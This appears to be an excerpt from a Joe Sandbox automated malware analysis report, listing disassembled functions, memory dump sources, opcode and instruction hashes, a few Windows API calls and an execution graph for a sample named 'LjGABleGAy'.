                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: e3393d17d4d361e182a14706feb4151e74289ebfe927a609c08628a73707f306
                      • Instruction ID: 3c72bb566479168dfe29f52c5c566654f88e9b86aba172f4b13903f75939c5d0
                      • Opcode Fuzzy Hash: e3393d17d4d361e182a14706feb4151e74289ebfe927a609c08628a73707f306
                      • Instruction Fuzzy Hash: A811F5B58003489FCB10DF99C845BEEBBF8EB48720F108419E918A7200D375A944CFA5
                      Function 03057828 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 0305788D
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2216939833.0000000003050000.00000040.00000800.00020000.00000000.sdmp, Offset: 03050000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_3050000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: 359f5b4b748c68b398d8842dc6c4a5ceaef615fe9069a40a3705830fa115ae69
                      • Instruction ID: e0c90db9e3767b48fa8dfd77729b434ec13c3d3a2c464ff83678db6ff8578bf4
                      • Opcode Fuzzy Hash: 359f5b4b748c68b398d8842dc6c4a5ceaef615fe9069a40a3705830fa115ae69
                      • Instruction Fuzzy Hash: 5A1103B58012489FDB10DF99D485BEEBBF4FB48320F20841AE918A7700C379A944CFA1
                      Function 012ED4C4 Relevance: .1, Instructions: 75COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215256335.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12ed000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 921d8c7d6bb50e09d79be69dc0162a9edb74f108cc12677cfb5d3713d6e03f49
                      • Instruction ID: 92bc15ece1221062782a0307829cc4dfd79bd14ef4e18a33dad13caef1ed890b
                      • Opcode Fuzzy Hash: 921d8c7d6bb50e09d79be69dc0162a9edb74f108cc12677cfb5d3713d6e03f49
                      • Instruction Fuzzy Hash: BE212571510248DFDB16DF58E9C8F26BFA5FB88318F60C569E9090B256C33AD416CBA2
                      Function 012FD01C Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215343186.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12fd000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8466081804eefd0d1c2f62a0a2624c50e0a9d5985b22cc1898a9d002f75075f4
                      • Instruction ID: 040dfa431e2e0366f5b627e0d92f52ced5a1ef118b4bcc851ed9fb8b0c4470dc
                      • Opcode Fuzzy Hash: 8466081804eefd0d1c2f62a0a2624c50e0a9d5985b22cc1898a9d002f75075f4
                      • Instruction Fuzzy Hash: FF210071614208DFDB15DF68D980B26FF65EB88314F20C57DEA0A4B256C37AD406CA62
                      Function 012FD1D4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215343186.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12fd000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 85c63fa558c6d37f9269fcd15db45d449b20224afacb4452140d147744abf20e
                      • Instruction ID: 6ebb577336a6c3be50934d6ba9955867eec15752c34d30aebd5f81d50b118223
                      • Opcode Fuzzy Hash: 85c63fa558c6d37f9269fcd15db45d449b20224afacb4452140d147744abf20e
                      • Instruction Fuzzy Hash: 4521D3795542089FDB05DFA8D580F26FB65FB84324F20C57DDA094B257C37AD406CAA1
                      Function 012FD006 Relevance: .1, Instructions: 62COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215343186.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12fd000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ce04c23e8672d40545515d216d60e3282410386dd2f454013869e1a05bdb1d0f
                      • Instruction ID: ce825f8d9c534849fdb9ac9605cb3b9934374f04a20d76aab5c69c1d71599319
                      • Opcode Fuzzy Hash: ce04c23e8672d40545515d216d60e3282410386dd2f454013869e1a05bdb1d0f
                      • Instruction Fuzzy Hash: 80217C755093848FDB03CF24D994715BF71EB46314F28C5EEDA498B2A7C33A980ACB62
                      Function 012ED4BF Relevance: .1, Instructions: 56COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215256335.00000000012ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 012ED000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12ed000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                      • Instruction ID: 7272ce65d5ab4c8c841cc95b3e995cf7fe3fa32c03b49169af7d60888b25ef01
                      • Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
                      • Instruction Fuzzy Hash: 25110376404284CFCB12CF54D9C4B16BFB1FB88314F24C6A9D9490B257C336D45ACBA2
                      Function 012FD1CF Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000A.00000002.2215343186.00000000012FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012FD000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_10_2_12fd000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction ID: f2a1c9ef9683b2c4e87e070eb80aeedeb7c06218ed307e7c907116c72cccbea4
                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction Fuzzy Hash: 1D11BB79504284DFDB02CF54C5C4B15FFA1FB84224F24C6AEDA494B297C33AD40ACBA2

                      Execution Graph

                      Execution Coverage:12.9%
                      Dynamic/Decrypted Code Coverage:100%
                      Signature Coverage:0%
                      Total number of Nodes:40
                      Total number of Limit Nodes:3
                      execution_graph 29477 65a6361 29478 65a62fc 29477->29478 29479 65a636a 29477->29479 29478->29479 29484 65a7400 29478->29484 29488 65a73f1 29478->29488 29492 65a7390 29478->29492 29480 65a631d 29485 65a7406 29484->29485 29486 65a7451 29485->29486 29496 65a7148 29485->29496 29486->29480 29490 65a738d 29488->29490 29489 65a7451 29489->29480 29490->29488 29490->29489 29491 65a7148 LoadLibraryW 29490->29491 29491->29489 29494 65a738d 29492->29494 29493 65a7451 29493->29480 29494->29492 29494->29493 29495 65a7148 LoadLibraryW 29494->29495 29495->29493 29498 65a75f0 LoadLibraryW 29496->29498 29499 65a7665 29498->29499 29499->29486 29448 12d0871 29453 12d08c8 29448->29453 29458 12d0817 29448->29458 29464 12d08d8 29448->29464 29449 12d0889 29454 12d08d8 29453->29454 29469 12d0ce8 29454->29469 29473 12d0ce0 29454->29473 29455 12d093e 29455->29449 29459 12d081d 29458->29459 29460 12d0897 29459->29460 29462 12d0ce8 GetConsoleWindow 29459->29462 29463 12d0ce0 GetConsoleWindow 29459->29463 29460->29449 29461 12d093e 29461->29449 29462->29461 29463->29461 29465 12d08fa 29464->29465 29467 12d0ce8 GetConsoleWindow 29465->29467 29468 12d0ce0 GetConsoleWindow 29465->29468 29466 12d093e 29466->29449 29467->29466 29468->29466 29470 12d0d26 GetConsoleWindow 29469->29470 29472 12d0d56 29470->29472 29472->29455 29474 12d0ce8 GetConsoleWindow 29473->29474 29476 12d0d56 29474->29476 29476->29455

                      Executed Functions

                      Function 065F04F4 Relevance: 1.7, Strings: 1, Instructions: 486COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID: j
                      • API String ID: 0-2137352139
                      • Opcode ID: ad78aa6bd9c39f0731ebeae8dd2301462bfe39a1c23ad2d5ed104bda437c4a47
                      • Instruction ID: 653bc8decee7a13474311660f7d47f17e381472177972581da130ad5c01fa27b
                      • Opcode Fuzzy Hash: ad78aa6bd9c39f0731ebeae8dd2301462bfe39a1c23ad2d5ed104bda437c4a47
                      • Instruction Fuzzy Hash: F912CD307506158FCB15EF68D494A6EBBB6FF85304F01494DD9029B3A6CBB6ED09CB82
                      Function 065F056A Relevance: 1.7, Strings: 1, Instructions: 451COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID: j
                      • API String ID: 0-2137352139
                      • Opcode ID: a3db37d8979649e2a58a411cf6c5625f82f89ff8d48a1ab8cb647702cf6fd93c
                      • Instruction ID: 436eee667c0d75ab1b31f4d973596a266d8d077acddb17ed628be1802871c0e1
                      • Opcode Fuzzy Hash: a3db37d8979649e2a58a411cf6c5625f82f89ff8d48a1ab8cb647702cf6fd93c
                      • Instruction Fuzzy Hash: 6602DE30710215CFCB15EF68C494A6E7BB6FF85304F008949D5029B3A6CBB6ED09CB92
                      Function 065A75E8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065A74A6), ref: 065A7656
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348645088.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65a0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: e96c507a2dfc47a96df888044a34ff87685f2e29ac649d8af37dc8a67f6647f5
                      • Instruction ID: da5c6865220f65b6f6ca94f4752fd965a7b23234b645ded40179c2ec87d36787
                      • Opcode Fuzzy Hash: e96c507a2dfc47a96df888044a34ff87685f2e29ac649d8af37dc8a67f6647f5
                      • Instruction Fuzzy Hash: E11103B9D003498FDB20DF9AC844ADEFBF4AF88210F14842AD529A7710C379A546CFA4
                      Function 065A7148 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                      Download Yara Rule
                      APIs
                      • LoadLibraryW.KERNELBASE(00000000,?,?,?,?,00000000,00000E20,?,?,065A74A6), ref: 065A7656
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348645088.00000000065A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065A0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65a0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: d5bb9837fbeea01b17c3d60a1d893d92988811643072ebf9a28c0cbafe078f8a
                      • Instruction ID: 7ee4b9fad740c4b59f4a76d63354b9b8f054dbe891abe125120cb4b93220428e
                      • Opcode Fuzzy Hash: d5bb9837fbeea01b17c3d60a1d893d92988811643072ebf9a28c0cbafe078f8a
                      • Instruction Fuzzy Hash: 121112B5D007498FDB20DF9AC444B9EFBF4EB88210F14842AD419B7310D379A545CFA5
                      Function 012D0CE0 Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                      Download Yara Rule
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 012D0D47
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2328614618.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12d0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID:
                      • API String ID: 2863861424-0
                      • Opcode ID: ab018f4e6712cf85bef2bdeb2425491ec9e2173eb53ee1c3c91e00b82f14fc4e
                      • Instruction ID: 9ebf6a123d93de3c4f3657bc8d6ee450df021dc6df258e00905234fa9b3f210b
                      • Opcode Fuzzy Hash: ab018f4e6712cf85bef2bdeb2425491ec9e2173eb53ee1c3c91e00b82f14fc4e
                      • Instruction Fuzzy Hash: 541146719003498FCB20DFAAC4497EEBFF4EF89324F20845AD559A7250C739A545CBA0
                      Function 012D0CE8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • GetConsoleWindow.KERNELBASE ref: 012D0D47
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2328614618.00000000012D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012D0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_12d0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID: ConsoleWindow
                      • String ID:
                      • API String ID: 2863861424-0
                      • Opcode ID: 6f87c5e4ea2ccf6cda3eba6ce45904c012ed08f321284ae8ce3eb81da026c955
                      • Instruction ID: 4982417611a4d5daa524db708128ae3613c9393d963b4e375fc6b1a7ed9edd93
                      • Opcode Fuzzy Hash: 6f87c5e4ea2ccf6cda3eba6ce45904c012ed08f321284ae8ce3eb81da026c955
                      • Instruction Fuzzy Hash: C31122B1D003498FDB24DFAAC4497AEFBF4EB48324F20881AD519A7250CB79A544CBA4
                      Function 065F1550 Relevance: 1.4, Instructions: 1413COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 9ed6b8499fecd15c00cfc87bd947d9efe96452f398166373e0bb513e2faf125c
                      • Instruction ID: 8a7c0c966ba2d1d4ccb34f981c5af49af38af05a88a53ce7f0124afe3138c3d6
                      • Opcode Fuzzy Hash: 9ed6b8499fecd15c00cfc87bd947d9efe96452f398166373e0bb513e2faf125c
                      • Instruction Fuzzy Hash: FFC23B74A502189FCB15DF58C990FAEBBB6FF88700F108099E609AB3A5DB71AD41CF51
                      Function 065F344F Relevance: 1.3, Instructions: 1304COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: fa18da5cc200476f10177a2fcbc9af3b995a200481e25fefe59d97bda2c1bb27
                      • Instruction ID: 8518d9b6624f5b6dd54c9f4a38d7ee7cb2691aea9a8b3523e697741512a6fd45
                      • Opcode Fuzzy Hash: fa18da5cc200476f10177a2fcbc9af3b995a200481e25fefe59d97bda2c1bb27
                      • Instruction Fuzzy Hash: DDB1C474B101449FDB45DF68C894A6EBBF2FF89300B1484A9EA15DB3A1CB75DC05CBA1
                      Function 065F0048 Relevance: .7, Instructions: 664COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f2d36c32f2432e3b4bb64682c0fa2a7f9416f91289a635be4e485b6836e80273
                      • Instruction ID: 547e29ec522e2b4837dde39d945ee3ef0c3ce177862e0e3345ddced56ea878c7
                      • Opcode Fuzzy Hash: f2d36c32f2432e3b4bb64682c0fa2a7f9416f91289a635be4e485b6836e80273
                      • Instruction Fuzzy Hash: 424278307506258FCB25EF68D490A6FBBB6FFC1314B014A5CD5029B399CB76ED098B82
                      Function 065F05E0 Relevance: .4, Instructions: 427COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: feaf23dfe142a1f85438a7480394176290e4131f5d4460eb43d740fee15b270c
                      • Instruction ID: c4d382f6131e248a323207e9dfb1d71794eae89b941259d37c23d0395e9fc8d0
                      • Opcode Fuzzy Hash: feaf23dfe142a1f85438a7480394176290e4131f5d4460eb43d740fee15b270c
                      • Instruction Fuzzy Hash: 3702B0307102148FCB15DF68C494A6E7BB6FF85704F048959D5029B3E6CBB6ED09CB92
                      Function 065F0656 Relevance: .4, Instructions: 389COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 46aa01e9dac5b10f679a139e96d40b8972f4013319801d6ffe3910c96f6c3da7
                      • Instruction ID: 824e3f73e42f6d08af62ea94a2ac1c0a292677d01cda44e9f7b5193302ed54ef
                      • Opcode Fuzzy Hash: 46aa01e9dac5b10f679a139e96d40b8972f4013319801d6ffe3910c96f6c3da7
                      • Instruction Fuzzy Hash: 76F19F30B10214CFDB05DF64C994A6E7BB6FF85704F048559EA029B3A6CBB6ED05CB92
                      Function 065F06CC Relevance: .4, Instructions: 355COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: e4a0b6ae930384540dc53a0df500f89711342e7387d5a247a7b896ad2b8d3cc2
                      • Instruction ID: 7551f9bf89116ea461077e0a34adb5e25054c66d3f1bf652158ef876e4b151b2
                      • Opcode Fuzzy Hash: e4a0b6ae930384540dc53a0df500f89711342e7387d5a247a7b896ad2b8d3cc2
                      • Instruction Fuzzy Hash: CBE17D30B212149FDB04DF64C995B6E7BB6FF84704F048459EA019B3E6CBB6E905CB92
                      Function 065F0000 Relevance: .4, Instructions: 352COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 7b94ff6134bd7e4c35b4dfbac4825d83f4a389c0f1e7065e247109275a3e8fde
                      • Instruction ID: 55952a7ba912f64316ab5a3bf1f6edd426ad59eaae0b0fe485132a1be2a6576e
                      • Opcode Fuzzy Hash: 7b94ff6134bd7e4c35b4dfbac4825d83f4a389c0f1e7065e247109275a3e8fde
                      • Instruction Fuzzy Hash: B5D19E30B112449FDB059F64C995B6E7BB6FF85700F14849AEA019B3E6CBB1DC05CBA2
                      Function 065F3138 Relevance: .2, Instructions: 239COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b72702f55ea7d0d80a19a505443ca0fce19652da307034f7d2c746940f0c9143
                      • Instruction ID: 00437ee47c585431fa4556b4a5028eb0b19b8398a44f65d18db3f5ab15fc0d4a
                      • Opcode Fuzzy Hash: b72702f55ea7d0d80a19a505443ca0fce19652da307034f7d2c746940f0c9143
                      • Instruction Fuzzy Hash: BB915E35B102049FCB44CF68C894E9EBBF6FF89710B5584AAE9059B361DB71EC05CBA1
                      Function 065F11A8 Relevance: .2, Instructions: 200COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6788092ae11fa5deba2639d93c4cb663ffd68afa8423cedf4ef4d0ae872623eb
                      • Instruction ID: 7ada443b46c7f859b7ff24814994fc4e48fb7be47a6b939f694d06141601ca71
                      • Opcode Fuzzy Hash: 6788092ae11fa5deba2639d93c4cb663ffd68afa8423cedf4ef4d0ae872623eb
                      • Instruction Fuzzy Hash: 36513A31B10A05CFCB649FBE988046EBBF5FFC6211B14897ADA45CB250EB31C845CB91
                      Function 0127D054 Relevance: .1, Instructions: 77COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2327836547.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_127d000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 3f4a402261528e4889b432d07c038aa30b22c83230fcf601546e2ca3abdddada
                      • Instruction ID: 960969415ee61499c8251902dc4594b520cdbc7d788d46c0f324f22763982d5a
                      • Opcode Fuzzy Hash: 3f4a402261528e4889b432d07c038aa30b22c83230fcf601546e2ca3abdddada
                      • Instruction Fuzzy Hash: 8B21F771510244DFCB16DF54D9C0B17BF65FF88314F24C569EA091A256C37AD416CBA1
                      Function 0128D474 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2327932542.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_128d000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2d1aebddbbe71bb65490a8d2a9a308436da62c8c3f90efa4f1c57314ba37d215
                      • Instruction ID: 981b714fbb2c02704ee4169475245f5d859b5bde8371127445123e4e0699de56
                      • Opcode Fuzzy Hash: 2d1aebddbbe71bb65490a8d2a9a308436da62c8c3f90efa4f1c57314ba37d215
                      • Instruction Fuzzy Hash: 95210771514208DFDB05EF98D5C0F26BB65FB88318F20C96ED9094B2D6C37AE40ACA72
                      Function 0128D2C4 Relevance: .1, Instructions: 72COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2327932542.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_128d000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: df229d0893096d165c51b11ef0e24a9395e841f707694ef972ddf9118c3fbe23
                      • Instruction ID: 291a772f30a98e20f809ee3d1d97618f18ccda76ab3c1ed942dd425c03ddb29e
                      • Opcode Fuzzy Hash: df229d0893096d165c51b11ef0e24a9395e841f707694ef972ddf9118c3fbe23
                      • Instruction Fuzzy Hash: BC212671515208DFDB05EF58D580B2ABF65FB84320F24C569D9494B2C6C37AD40ACAA1
                      Function 0127D04F Relevance: .1, Instructions: 58COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2327836547.000000000127D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0127D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_127d000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                      • Instruction ID: 4624128b97348ca23a1dd3b0b4fbf9b66636d5616e70d2704780a2128e014185
                      • Opcode Fuzzy Hash: b4df52cb15700b59c5b6b401fa95ea1d4e97f6e18881beb99e30f99f1fcf6035
                      • Instruction Fuzzy Hash: CA21C072504284DFCF06CF44D9C4B16BF72FF88314F2486A9DA480A257C33AD416CB91
                      Function 0128D46F Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2327932542.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_128d000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction ID: c974c95c2013a59b3183986bbb4c380fdfdc65fe0911110fb511ee2d81fb3ade
                      • Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
                      • Instruction Fuzzy Hash: 6E11DD75504284CFDB02DF54D5C4B15BFB2FB88318F24C6AAD9494B296C33AD40ACB62
                      Function 0128D2BF Relevance: .1, Instructions: 53COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2327932542.000000000128D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0128D000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_128d000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                      • Instruction ID: 8031a918a47eeffb4997db548b714aaa9ed6fad4ae13bbb818b22795ee68fe18
                      • Opcode Fuzzy Hash: 58489c3f61924d27558184a5eb21aea17821769c0c96028cc0fb4c2ef8240ab9
                      • Instruction Fuzzy Hash: 8311DD76504284CFDB02DF14D5C4B19BF61FB84224F28C6AAD9494B686C33AD40ACFA2

                      Non-executed Functions

                      Function 065F0D50 Relevance: 10.3, Strings: 8, Instructions: 298COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.2348827463.00000000065F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065F0000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_65f0000_LjGABleGAy.jbxd
                      Similarity
                      • API ID:
                      • String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
                      • API String ID: 0-1273862796
                      • Opcode ID: 9189b89cd918d82ffc0b78598b93f1e633f6bba6c4709e8d56dfd958f7b6b67e
                      • Instruction ID: acb6570c22fc806c6d9226dcc95a8dc6ced0204cbb0d25e98ade4df46e714069
                      • Opcode Fuzzy Hash: 9189b89cd918d82ffc0b78598b93f1e633f6bba6c4709e8d56dfd958f7b6b67e
                      • Instruction Fuzzy Hash: 06B1D430B10646CFDB94DB69C96497EBBF6BF89310B18846AE606D7392CB34DC01CB91